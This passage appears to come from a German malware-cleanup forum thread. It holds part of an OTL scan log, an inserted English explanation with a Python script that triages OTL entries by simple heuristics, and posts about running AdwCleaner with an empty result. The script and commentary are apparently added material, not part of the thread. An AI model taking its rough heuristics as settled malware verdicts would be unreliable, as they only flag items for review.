[2012.10.10 19:03:18 | 000,362,496 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64win.dll
[2012.10.10 19:03:18 | 000,243,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64.dll
[2012.10.10 19:03:18 | 000,025,600 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\setup16.exe
[2012.10.10 19:03:18 | 000,016,384 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntvdm64.dll
[2012.10.10 19:03:18 | 000,014,336 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntvdm64.dll
[2012.10.10 19:03:18 | 000,013,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wow64cpu.dll
[2012.10.10 19:03:18 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wow32.dll
[2012.10.10 19:03:18 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-processthreads-l1-1-0.dll
[2012.10.10 19:03:18 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-memory-l1-1-0.dll
[2012.10.10 19:03:17 | 000,007,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\instnm.exe
[2012.10.10 19:03:17 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-threadpool-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-processthreads-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-sysinfo-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-sysinfo-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-synch-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-synch-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-misc-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-localregistry-l1-1-0.dll
[2012.10.10 19:03:17 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-localregistry-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-rtlsupport-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-processenvironment-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-processenvironment-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-namedpipe-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-namedpipe-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-misc-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-memory-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-libraryloader-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-interlocked-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-heap-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-xstate-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-util-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-string-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-string-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-rtlsupport-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-profile-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-profile-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-io-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-io-l1-1-0.dll
[2012.10.10 19:03:17 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-interlocked-l1-1-0.dll
[2012.10.10 19:03:16 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-security-base-l1-1-0.dll
[2012.10.10 19:03:16 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-file-l1-1-0.dll
[2012.10.10 19:03:16 | 000,005,120 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-file-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-heap-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-handle-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-handle-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-fibers-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-fibers-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-errorhandling-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-errorhandling-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-delayload-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-delayload-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-debug-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-debug-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-datetime-l1-1-0.dll
[2012.10.10 19:03:16 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-datetime-l1-1-0.dll
[2012.10.10 19:03:14 | 000,006,144 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
[2012.10.10 19:03:14 | 000,004,608 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
[2012.10.10 19:03:14 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-localization-l1-1-0.dll
[2012.10.10 19:03:14 | 000,003,584 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
[2012.10.10 19:03:14 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
[2012.10.10 19:03:13 | 000,004,096 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-localization-l1-1-0.dll
[2012.10.10 19:03:13 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\api-ms-win-core-console-l1-1-0.dll
[2012.10.10 19:03:13 | 000,003,072 | -H-- | C] (Microsoft Corporation) -- C:\Windows\SysNative\api-ms-win-core-console-l1-1-0.dll
[2012.10.10 19:03:12 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\user.exe
[2012.10.10 19:03:07 | 000,220,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wintrust.dll
[2012.10.10 19:02:55 | 001,464,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\crypt32.dll
[2012.10.10 19:02:54 | 000,140,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptnet.dll
[2012.10.08 20:45:28 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Live Add-in
[2012.10.08 19:30:24 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Roaming\TuneUp Software
[2012.10.08 19:24:18 | 000,000,000 | ---D | C] -- C:\ProgramData\TuneUp Software
[2012.10.08 19:24:00 | 000,000,000 | -HSD | C] -- C:\ProgramData\{32364CEA-7855-4A3C-B674-53D8E9B97936}
[2012.10.08 19:23:59 | 000,000,000 | -H-D | C] -- C:\ProgramData\Common Files
[2012.10.07 20:08:40 | 000,000,000 | ---D | C] -- C:\Windows\pss
[2012.10.07 19:56:06 | 000,514,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\qdvd.dll
[2012.10.07 19:56:06 | 000,366,592 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\qdvd.dll
[2012.10.07 19:49:01 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\Tracing
[2012.10.07 19:28:28 | 000,000,000 | ---D | C] -- C:\Windows\en
[2012.10.07 19:27:59 | 000,000,000 | ---D | C] -- C:\Windows\de
[2012.10.07 19:19:32 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Reference Assemblies
[2012.10.07 19:19:32 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\MSBuild
[2012.10.07 19:19:31 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\XPSViewer
[2012.10.07 19:19:31 | 000,000,000 | ---D | C] -- C:\Windows\SysWow64\BestPractices
[2012.10.07 19:19:30 | 000,000,000 | ---D | C] -- C:\Program Files\Reference Assemblies
[2012.10.07 19:19:30 | 000,000,000 | ---D | C] -- C:\Program Files\MSBuild
[2012.10.07 19:19:30 | 000,000,000 | ---D | C] -- C:\inetpub
[2012.10.07 19:19:30 | 000,000,000 | ---D | C] -- C:\Windows\SysNative\BestPractices
[2012.10.07 15:47:21 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools
[2012.10.07 15:47:09 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Designer
[2012.10.07 15:46:51 | 000,000,000 | ---D | C] -- C:\Windows\ShellNew
[2012.10.07 15:46:45 | 000,000,000 | ---D
| C] -- C:\Program Files (x86)\Microsoft Office [2012.10.07 13:40:15 | 062,164,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MRT.exe [2012.10.07 13:18:48 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\Simon u. Garfunkel 1999 [2012.10.02 16:21:30 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\Documents\_Transfer [2012.10.02 16:19:03 | 000,000,000 | ---D | C] -- C:\Users\ASUS TT\AppData\Local\PDF24 ========== Files - Modified Within 30 Days ========== [2012.10.29 14:35:32 | 000,014,016 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 [2012.10.29 14:35:32 | 000,014,016 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 [2012.10.29 14:35:05 | 001,839,024 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI [2012.10.29 14:35:05 | 000,785,562 | ---- | M] () -- C:\Windows\SysNative\perfh007.dat [2012.10.29 14:35:05 | 000,725,776 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat [2012.10.29 14:35:05 | 000,180,820 | ---- | M] () -- C:\Windows\SysNative\perfc007.dat [2012.10.29 14:35:05 | 000,147,374 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat [2012.10.29 14:30:31 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\ASUS TT\Desktop\OTL.exe [2012.10.29 14:27:50 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2012.10.29 14:27:46 | 3220,627,456 | -HS- | M] () -- C:\hiberfil.sys [2012.10.28 21:48:28 | 000,000,512 | ---- | M] () -- C:\Users\ASUS TT\Desktop\MBR.dat [2012.10.28 21:05:54 | 004,731,392 | ---- | M] (AVAST Software) -- C:\Users\ASUS TT\Desktop\aswMBR.exe [2012.10.28 15:21:42 | 002,213,464 | ---- | M] (Kaspersky Lab ZAO) -- C:\Users\ASUS TT\Desktop\tdsskiller.exe [2012.10.28 14:59:57 | 004,989,309 | R--- | M] (Swearware) -- C:\Users\ASUS TT\Desktop\ComboFix.exe [2012.10.25 18:57:23 | 000,086,249 | ---- | M] () -- C:\Users\ASUS TT\Documents\Ausgabentabelle Katja und Thomas aktuell_tt alleine 
10.2012.ods [2012.10.25 17:17:19 | 000,000,027 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\hosts [2012.10.24 19:00:36 | 000,538,941 | ---- | M] () -- C:\Users\ASUS TT\Desktop\adwcleaner.exe [2012.10.21 18:24:04 | 002,322,184 | ---- | M] (ESET) -- C:\Users\ASUS TT\Desktop\esetsmartinstaller_enu.exe [2012.10.14 20:16:07 | 000,696,760 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe [2012.10.14 20:16:07 | 000,073,656 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl [2012.10.14 19:59:00 | 000,001,857 | ---- | M] () -- C:\Users\Public\Desktop\PDF24 Fax.lnk [2012.10.14 19:58:59 | 000,001,872 | ---- | M] () -- C:\Users\Public\Desktop\PDF24 Editor.lnk [2012.10.12 20:05:11 | 000,058,445 | ---- | M] () -- C:\Users\ASUS TT\Documents\Bild DNS Fehler bei Reiter Anwendungen.pdf [2012.10.10 19:39:15 | 000,002,628 | ---- | M] () -- C:\Users\ASUS TT\Desktop\Testdruck für Farbdrucker - Verknüpfung.lnk [2012.10.10 19:38:59 | 000,002,436 | ---- | M] () -- C:\Users\ASUS TT\Desktop\SoundControl - Verknüpfung.lnk [2012.10.10 19:38:35 | 000,003,388 | ---- | M] () -- C:\Users\ASUS TT\Desktop\tvbrowser-transportable - Verknüpfung.lnk [2012.10.10 19:37:34 | 000,001,674 | ---- | M] () -- C:\Users\ASUS TT\Desktop\adrl.lnk [2012.10.10 19:37:03 | 000,001,965 | ---- | M] () -- C:\Users\ASUS TT\Desktop\Ausgabentabelle Katja und Thomas.lnk [2012.10.07 19:20:26 | 001,723,808 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI [2012.10.07 15:47:47 | 000,000,400 | ---- | M] () -- C:\Windows\ODBC.INI [2012.10.02 00:08:12 | 000,001,912 | ---- | M] () -- C:\Windows\epplauncher.mif ========== Files Created - No Company Name ========== [2012.10.28 21:48:28 | 000,000,512 | ---- | C] () -- C:\Users\ASUS TT\Desktop\MBR.dat [2012.10.25 18:53:55 | 000,086,249 | ---- | C] () -- C:\Users\ASUS TT\Documents\Ausgabentabelle Katja und Thomas aktuell_tt alleine 10.2012.ods [2012.10.25 17:10:02 | 000,256,000 | ---- | C] () -- 
C:\Windows\PEV.exe [2012.10.25 17:10:02 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe [2012.10.25 17:10:02 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe [2012.10.25 17:10:02 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe [2012.10.25 17:10:02 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe [2012.10.24 18:57:28 | 000,538,941 | ---- | C] () -- C:\Users\ASUS TT\Desktop\adwcleaner.exe [2012.10.14 19:59:00 | 000,001,857 | ---- | C] () -- C:\Users\Public\Desktop\PDF24 Fax.lnk [2012.10.14 19:58:59 | 000,001,872 | ---- | C] () -- C:\Users\Public\Desktop\PDF24 Editor.lnk [2012.10.12 20:05:36 | 000,058,445 | ---- | C] () -- C:\Users\ASUS TT\Documents\Bild DNS Fehler bei Reiter Anwendungen.pdf [2012.10.07 19:27:56 | 000,001,305 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk [2012.10.07 15:47:21 | 000,002,715 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Excel.lnk [2012.10.07 15:47:21 | 000,002,703 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft PowerPoint.lnk [2012.10.07 15:47:21 | 000,002,683 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Word.lnk [2012.09.23 10:39:16 | 000,001,488 | ---- | C] () -- C:\Users\ASUS TT\AppData\Local\RecConfig.xml [2012.08.22 08:32:10 | 000,000,524 | ---- | C] () -- C:\Windows\wininit.ini [2012.07.20 20:08:22 | 000,000,400 | ---- | C] () -- C:\Windows\ODBC.INI [2012.07.01 13:08:37 | 000,175,616 | ---- | C] () -- C:\Windows\SysWow64\unrar.dll [2012.07.01 12:42:02 | 001,723,808 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI ========== ZeroAccess Check ========== [2009.07.14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 "" = C:\Windows\SysNative\shell32.dll -- [2012.06.09 06:43:10 | 014,172,672 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2012.06.09 05:41:00 | 012,873,728 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009.07.14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2010.11.20 13:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009.07.14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] ========== LOP Check ========== [2012.08.17 00:43:05 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Ashampoo [2012.09.23 10:27:32 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Audacity [2012.09.26 22:40:24 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\BirthdayRemember [2012.07.09 20:02:52 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Canneverbe Limited [2012.09.18 19:27:03 | 
000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Downloaded Installations [2012.10.18 00:10:40 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\DriverCure [2012.08.14 23:15:02 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoft [2012.08.14 02:07:22 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\DVDVideoSoftIEHelpers [2012.07.01 13:00:58 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\FreeCommander [2012.07.08 20:30:14 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\FRITZ! [2012.07.08 20:20:19 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\FRITZ!fax für FRITZ!Box [2012.08.26 21:23:37 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\GetRightToGo [2012.07.01 14:56:42 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Greenshot [2012.08.26 22:24:55 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Highresolution Enterprises [2012.08.10 21:42:41 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\KLS Soft [2012.10.25 18:36:12 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Nitro PDF [2012.07.01 20:07:40 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\OpenOffice.org [2012.09.28 22:49:56 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\SoundControl [2012.10.18 00:10:39 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\SpeedyPC Software [2012.07.22 12:07:33 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\TeamViewer [2012.10.08 19:30:24 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\TuneUp Software [2012.09.26 00:29:28 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\TV-Browser [2012.07.09 19:28:08 | 000,000,000 | ---D | M] -- C:\Users\ASUS TT\AppData\Roaming\Windows Live Writer ========== Purity Check ========== < End of report > |
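The OTL listing above is what the helper reads by eye: which new executables carry no company name and sit in a system location, which new objects are hidden/system in places where that is unusual, and whether the hosts file was touched. Those three checks can be scripted. The Python below is an added example for this thread, not code from OTL or from the helper; it parses OTL's file-entry line format and applies three heuristics of my own (the directory lists, extension list and allow-list are assumptions) to a handful of entries copied from the log above.

```python
import re
from typing import Optional

# Format of one OTL file entry (as in the log above):
#   [2012.10.25 17:10:02 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
#   timestamp | size | attribute flags (R=read-only, H=hidden, S=system, D=directory)
#   | C=created or M=modified ]  optional (Company Name)  --  path
OTL_ENTRY = re.compile(
    r"^\[(?P<ts>\d{4}\.\d{2}\.\d{2} \d{2}:\d{2}:\d{2}) \| "
    r"(?P<size>[\d,]+) \| (?P<attrs>[RHSD-]{4}) \| (?P<kind>[CM])\]"
    r"(?: \((?P<company>[^)]*)\))? -- (?P<path>.+?)\s*$"
)

# Heuristic inputs below are this example's own assumptions, not OTL rules.
EXEC_EXT = (".exe", ".dll", ".sys", ".scr", ".cpl")
WATCH_PREFIXES = ("c:\\windows\\", "c:\\programdata\\", "c:\\users\\")
SYSTEM_DIRS = ("c:\\windows\\sysnative\\", "c:\\windows\\syswow64\\",
               "c:\\windows\\system32\\")
EXPECTED_HS_FILES = {"c:\\hiberfil.sys", "c:\\pagefile.sys"}

# Entries copied from the OTL log above (plus one section header to show it is skipped).
SAMPLE_LOG = r"""
[2012.10.10 19:03:07 | 000,220,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wintrust.dll
[2012.10.08 19:24:00 | 000,000,000 | -HSD | C] -- C:\ProgramData\{32364CEA-7855-4A3C-B674-53D8E9B97936}
[2012.10.29 14:27:46 | 3220,627,456 | -HS- | M] () -- C:\hiberfil.sys
[2012.10.25 17:17:19 | 000,000,027 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\hosts
[2012.10.25 17:10:02 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2012.10.25 17:10:02 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2012.10.07 13:40:15 | 062,164,608 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MRT.exe
[2009.07.14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
========== LOP Check ==========
"""


def parse_otl_entry(line: str) -> Optional[dict]:
    """Return the fields of one OTL file entry, or None for any other line."""
    m = OTL_ENTRY.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["size"] = int(e["size"].replace(",", ""))
    e["company"] = (e["company"] or "").strip()
    e["readonly"], e["hidden"], e["system"], e["isdir"] = (c != "-" for c in e["attrs"])
    return e


def triage_entry(e: dict) -> list:
    """Apply the three review heuristics to one parsed entry; return the reasons that fire."""
    reasons = []
    p = e["path"].lower()
    if p.endswith("\\drivers\\etc\\hosts"):
        what = "modified" if e["kind"] == "M" else "created"
        reasons.append(f"hosts file {what} ({e['size']} bytes): open it and look for redirects")
    if (not e["isdir"] and p.endswith(EXEC_EXT) and not e["company"]
            and p.startswith(WATCH_PREFIXES)):
        reasons.append("executable without company name: check signature and hash")
    if (e["hidden"] and e["system"] and not p.startswith(SYSTEM_DIRS)
            and p not in EXPECTED_HS_FILES):
        reasons.append("hidden+system attributes outside the system directories")
    return reasons


def triage_log(text: str) -> list:
    """Return (path, reason) pairs for every entry in an OTL log that trips a heuristic."""
    hits = []
    for line in text.splitlines():
        e = parse_otl_entry(line)
        if e is None:
            continue
        for reason in triage_entry(e):
            hits.append((e["path"], reason))
    return hits


if __name__ == "__main__":
    for path, reason in triage_log(SAMPLE_LOG):
        print(f"{path}\n    {reason}")
```

Read the output as a review list, not a verdict. On this log the five executables created in C:\Windows at 17:10:02 (PEV.exe, MBR.exe, sed.exe, grep.exe, zip.exe) are flagged because they have no company name, but ComboFix.exe sits on the desktop and was run in that window, and tools of that kind drop helper binaries into C:\Windows; confirm with a hash rather than assuming either way. The hosts file at 27 bytes is the size of a single `127.0.0.1 localhost` line, which is what a reset looks like rather than a hijack, but open it anyway. C:\Windows\assembly\Desktop.ini trips the hidden+system rule because OTL's ZeroAccess check reports it; its 2009 timestamp and 227-byte size are the values to compare against a clean install.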
29.10.2012, 15:25 | #18 |
/// Winkelfunktion /// TB-Süch-Tiger™ | AdwCleaner - find toolbars and unwanted start/search pages
Please download AdwCleaner to your desktop. If AdwCleaner has already been downloaded before, please delete the old adwcleaner.exe and download it again!!
__________________ |
29.10.2012, 22:48 | #19 |
| Hello Cosinus, it is remarkable how engaged you (all) are here. But I am now wondering what all these log files achieve? Is it still not clear whether there is a virus on here? Are you still searching/checking? With all this effort I am now considering whether, after one week, it would not make more sense to back up my personal data and wipe the whole system. It is real work, but how much longer will this go on? Please do not get me wrong, your work for free deserves every respect. Here is the log file from AdwCleaner: Code:
ATTFilter
# AdwCleaner v2.005 - Datei am 29/10/2012 um 22:44:36 erstellt
# Aktualisiert am 14/10/2012 von Xplode
# Betriebssystem : Windows 7 Ultimate Service Pack 1 (64 bits)
# Benutzer : ASUS TT - ASUSTT-PC
# Bootmodus : Normal
# Ausgeführt unter : C:\Users\ASUS TT\Desktop\adwcleaner.exe
# Option [Suche]

**** [Dienste] ****

***** [Dateien / Ordner] *****

***** [Registrierungsdatenbank] *****

***** [Internet Browser] *****

